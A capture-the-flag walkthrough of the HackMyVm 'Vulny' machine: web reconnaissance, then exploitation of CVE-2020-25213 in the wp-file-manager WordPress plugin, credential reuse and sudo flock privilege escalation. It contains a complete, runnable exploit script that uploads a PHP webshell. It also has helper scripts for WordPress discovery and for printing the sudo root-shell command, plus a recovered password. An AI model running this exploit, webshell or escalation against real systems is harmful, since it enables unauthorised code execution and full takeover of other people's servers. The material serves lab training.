
Walkthrough HackMyVm - Vulny

vulny.PNG

Here is my writeup of Vulny, an easy-rated machine on the HackMyVm platform; if you are interested, you can find it there. Let's start.

Reconnaissance

As always, the first thing I do is port scanning. Here nmap finds only one open TCP port, HTTP (80):

$ nmap -sC -sV -sT 192.168.1.38
Starting Nmap 7.93 ( https://nmap.org ) at 2023-11-09 03:13 EST
Nmap scan report for 192.168.1.38
Host is up (0.0014s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.81 seconds                                                     

Website

1.PNG

The website only shows the Apache default page, so we need to look for hidden paths or files with a directory brute-forcing tool such as dirb or dirsearch.

Directory Bruteforce

$ dirsearch -u http://192.168.1.38/ --exclude-status 403,401

  _|. _ _  _  _  _ _|_    v0.4.2                                                                                                                                     
 (_||| _) (/_(_|| (_| )                                                                                                                                              
                                                                                                                                                                     
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Target: http://192.168.1.38/

[04:12:21] Starting: 
[04:12:49] 200 -   11KB - /index.html                                       
[04:12:51] 301 -  317B  - /javascript  ->  http://192.168.1.38/javascript/  
[04:13:10] 301 -  313B  - /secret  ->  http://192.168.1.38/secret/          
              
Task Completed                                                                                                                             

Here we find two directories, /javascript and /secret. Accessing /javascript returns Forbidden, but /secret is accessible and contains a note.

2.PNG

The note tells us there is a WordPress config file (wp-config.php, which holds the database username and password) somewhere on this host. This is odd at first, because neither Wappalyzer nor wpscan reported any sign of WordPress. The reason is that both were run against the site root, which only serves the Apache default page; an install that lives under a subdirectory is invisible to them unless they are pointed at that path.

3.PNG
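The missed detection above comes down to where the scanner looks. The following is an added example (not part of the original writeup and not wpscan's code) that probes a few stock WordPress markers under an arbitrary base path, so the same checks that return nothing at / light up at /secret/. The responses in FAKE_SITE are constructed for the example, not captured from the machine, and reading the plugin version from the plugin's readme.txt "Stable tag" line is a standard wpscan-style check that the writeup itself did not use (it found the version under wp-content/uploads/2020/10/ instead).

```python
import re
import urllib.error
import urllib.request

# Constructed responses (status, body) standing in for the target: the site root serves
# the Apache default page, the WordPress install lives under /secret/.
FAKE_SITE = {
    "http://192.168.1.38/": (200, "<title>Apache2 Ubuntu Default Page: It works</title>"),
    "http://192.168.1.38/secret/readme.html": (200, "<h1>WordPress</h1> Welcome. WordPress is a very special project"),
    "http://192.168.1.38/secret/wp-login.php": (200, '<form name="loginform" id="loginform" action="wp-login.php">'),
    "http://192.168.1.38/secret/wp-includes/": (403, "Forbidden"),
    "http://192.168.1.38/secret/wp-content/uploads/": (200, '<a href="2020/">2020/</a>'),
    "http://192.168.1.38/secret/wp-content/plugins/wp-file-manager/readme.txt": (200, "=== File Manager ===\nStable tag: 6.0\n"),
}


def fake_fetch(url):
    """Offline stand-in for http_fetch, backed by the constructed FAKE_SITE table."""
    return FAKE_SITE.get(url, (404, "Not Found"))


def http_fetch(url, timeout=5):
    """Real fetch: returns (status, body) and treats HTTP errors (403, 404, 500) as answers, not exceptions."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status, resp.read().decode(errors="replace")
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode(errors="replace")


# path relative to the suspected WordPress root -> (expected status, body pattern or None)
MARKERS = {
    "readme.html": (200, re.compile(r"WordPress")),
    "wp-login.php": (200, re.compile(r'id="loginform"')),
    "wp-includes/": (403, None),          # Apache denies the listing but the directory exists
    "wp-content/uploads/": (200, None),   # directory listing enabled, as on this box
}


def wordpress_markers(base_url, fetch):
    """Check each marker under base_url; True means the path answered as a WordPress install would."""
    base = base_url.rstrip("/") + "/"
    found = {}
    for path, (status, pattern) in MARKERS.items():
        code, body = fetch(base + path)
        found[path] = code == status and (pattern is None or bool(pattern.search(body)))
    return found


def plugin_version(base_url, slug, fetch):
    """Read the plugin version from the 'Stable tag' line of its readme.txt, if the file is exposed."""
    code, body = fetch(base_url.rstrip("/") + f"/wp-content/plugins/{slug}/readme.txt")
    if code != 200:
        return None
    m = re.search(r"^Stable tag:\s*([\w.]+)", body, re.M)
    return m.group(1) if m else None


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "http://192.168.1.38/secret/"
    for path, hit in wordpress_markers(target, http_fetch).items():
        print(f"{'[+]' if hit else '[-]'} {path}")
    print("wp-file-manager version:", plugin_version(target, "wp-file-manager", http_fetch))
```

Run it against the site root and every marker is negative; run it against /secret/ and they all match, which is exactly why a scanner must be given the subdirectory as its URL.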

Next, we brute-force directories again, this time under /secret.

$ dirsearch -u http://192.168.1.38/secret/ --exclude-status 403,401

  _|. _ _  _  _  _ _|_    v0.4.2                                                                                                                                     
 (_||| _) (/_(_|| (_| )                                                                                                                                              
                                                                                                                                                                     
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Target: http://192.168.1.38/secret/

[04:32:45] Starting: 
[04:33:29] 200 -    7KB - /secret/readme.html                               
[04:33:42] 301 -  322B  - /secret/wp-admin  ->  http://192.168.1.38/secret/wp-admin/
[04:33:42] 301 -  324B  - /secret/wp-content  ->  http://192.168.1.38/secret/wp-content/
[04:33:42] 500 -  610B  - /secret/wp-content/plugins/akismet/akismet.php    
[04:33:42] 500 -  610B  - /secret/wp-content/plugins/akismet/admin.php      
[04:33:42] 200 -    2KB - /secret/wp-content/                               
[04:33:42] 200 - 1003B  - /secret/wp-content/upgrade/                       
[04:33:42] 200 -    1KB - /secret/wp-content/uploads/                       
[04:33:42] 301 -  325B  - /secret/wp-includes  ->  http://192.168.1.38/secret/wp-includes/
[04:33:43] 500 -    3KB - /secret/wp-admin/setup-config.php                 
[04:33:43] 500 -    0B  - /secret/wp-includes/rss-functions.php             
                                                                        
Task Completed                                                                   

From these results, three paths were found:

/wp-admin: the response is the same as /secret

4.PNG

/wp-content: response 200

5.PNG

/wp-includes: Forbidden

6.PNG

Next, we focus on /wp-content. It contains the /uploads directory, and browsing it shows that the site uses the wp-file-manager plugin.

7.PNG

Web Exploitation

If we access http://192.168.1.38/secret/wp-content/uploads/2020/10/ we find the version of wp-file-manager, namely 6.0, and this version is vulnerable! File Manager releases before 6.9 are affected by CVE-2020-25213: the plugin ships its elFinder connector (lib/php/connector.minimal.php) reachable without authentication, so anyone can upload a PHP file and execute it.

8.PNG

We need to download the public exploit and make a small change to its URLs: because WordPress is installed under /secret, that prefix has to be added in front of /wp-content in both the upload URL and the webshell URL.

#!/usr/bin/env python3

# Exploit Title: WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE
# Date: [ 22-01-2023 ]
# Exploit Author: [BLY]
# Vendor Homepage: [https://wpscan.com/vulnerability/10389]
# Version: [ File Manager plugin 6.0-6.9]
# Tested on: [ Debian ]
# CVE : [ CVE-2020-25213 ]
#
# Adapted for Vulny: WordPress lives under /secret, so both URLs below carry that prefix.

import sys, signal, requests
from bs4 import BeautifulSoup
#from pprint import pprint

def handler(sig, frame):
    print("[!] Exiting")
    sys.exit(1)

signal.signal(signal.SIGINT, handler)

def commandexec(command):
    # The connector's root directory is lib/files/, so the uploaded webshell lands there.
    exec_url = url + "/secret/wp-content/plugins/wp-file-manager/lib/php/../files/shell.php"
    params = {
        "cmd": command
    }

    r = requests.get(exec_url, params=params)

    # The webshell wraps its output in <pre>; strip the markup and print the text.
    soup = BeautifulSoup(r.text, 'html.parser')
    text = soup.get_text()

    print(text)

def exploit():

    global url

    url = sys.argv[1].rstrip("/")   # avoid a double slash when the URL ends with /
    command = sys.argv[2]
    # elFinder connector exposed without authentication (CVE-2020-25213)
    upload_url = url + "/secret/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"

    headers = {
        'content-type': "multipart/form-data; boundary=----WebKitFormBoundaryvToPIGAB0m9SB1Ww",
        'Connection': "close"
    }

    # Multipart body: cmd=upload, target=l1_Lw (elFinder hash of the volume root "/"),
    # and the PHP webshell as the upload[] file part.
    payload = "------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"shell.php\"\r\nContent-Type: application/x-php\r\n\r\n<?php echo \"<pre>\" . shell_exec($_REQUEST['cmd']) . \"</pre>\"; ?>\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww--"

    try:
        r = requests.post(upload_url, data=payload, headers=headers)
        #pprint(r.json())
        commandexec(command)
    except requests.RequestException as e:
        print("[!] Something went wrong:", e)

def help():

    print("\n[*] Usage: python3", sys.argv[0], "\"url\" \"command\"")
    print("[!] Example: python3", sys.argv[0], "http://wordpress.local/ id")


if __name__ == '__main__':

    if len(sys.argv) != 3:
        help()

    else:
        exploit()

Then run the script.

9.PNG

The script gives us command execution through the uploaded webshell; next we upgrade it to a reverse shell.

10.PNG

After getting the reverse shell, we check the WordPress config file (wp-config.php) for the username and password the note in /secret hinted at.

11.PNG

idrinksomewater

A password is found in the config. /etc/passwd lists a user named adrian (Ari Adrian), so we can assume this password is reused for that account.

Initial Access

Log in as adrian with the password obtained earlier, and we are in.

12.PNG

Next we check whether this user has any sudo rights; sudo -l lists the commands they are permitted to run.

13.PNG

The list includes the flock binary, which we can use for privilege escalation: flock takes a lock on the file given as its first argument and then executes the command that follows, so when flock runs through sudo, that command runs as root.

14.PNG
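Deciding whether a sudo entry is actually exploitable is the check worth automating here. The following is an added example (not part of the writeup) that parses the rule lines of sudo -l output and, for binaries that execute a caller-supplied command, returns the sudo invocation that yields a root shell; for flock that is the well-known flock -u / /bin/sh. The sample sudo -l text is constructed for the example (the hostname, the /usr/bin/flock path and the NOPASSWD tag are assumptions, since the real output is only in the screenshot), and the table only covers flock because that is the binary on this box.

```python
import os
import re
import shlex

# Binaries that run a command passed on their own command line, and the arguments that
# turn a sudo rule on them into a root shell. flock takes a lock on FILE and then runs CMD.
ESCALATIONS = {
    "flock": ["-u", "/", "/bin/sh"],
}

# Constructed sudo -l output for the example; the real one is in the screenshot above.
SAMPLE_SUDO_L = """\
Matching Defaults entries for adrian on vulny:
    env_reset, mail_badpass

User adrian may run the following commands on vulny:
    (root) NOPASSWD: /usr/bin/flock
"""

# "    (root) NOPASSWD: /usr/bin/flock"  ->  runas="root", tags="NOPASSWD: ", cmds="/usr/bin/flock"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+?)\s*$")


def parse_sudo_l(output: str) -> list:
    """Parse the rule lines that follow 'may run the following commands' in sudo -l output."""
    rules, in_rules = [], False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules else None
        if not m:
            continue
        tags = {t.strip() for t in m["tags"].split(":") if t.strip()}
        for cmd in m["cmds"].split(", "):          # one line may list several commands
            rules.append({"runas": m["runas"].strip(), "nopasswd": "NOPASSWD" in tags, "command": cmd.strip()})
    return rules


def escalation_for(rule: dict):
    """Return the sudo command line that gives a root shell, or None if the rule does not allow it."""
    argv = shlex.split(rule["command"])
    if not argv or argv[0] == "ALL":
        return None
    name = os.path.basename(argv[0])
    runas = rule["runas"].split(":")[0].strip()    # "(ALL : ALL)" -> "ALL", "(root)" -> "root"
    if name not in ESCALATIONS or runas not in ("root", "ALL"):
        return None
    if len(argv) > 1:
        # sudoers pinned the arguments; sudo rejects anything extra, so no command can be appended.
        return None
    return ["sudo", argv[0]] + ESCALATIONS[name]


if __name__ == "__main__":
    import subprocess
    out = subprocess.run(["sudo", "-n", "-l"], capture_output=True, text=True).stdout or SAMPLE_SUDO_L
    for rule in parse_sudo_l(out):
        esc = escalation_for(rule)
        print(rule["command"], "->", " ".join(esc) if esc else "no direct shell")
```

The argument check matters in practice: a sudoers line that fixes flock's arguments (for example /usr/bin/flock -u /tmp/lock) cannot be turned into a shell this way, because sudo refuses the extra command, so the parser reports it as not directly exploitable.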

Root obtained. Vulny pwned!

15.PNG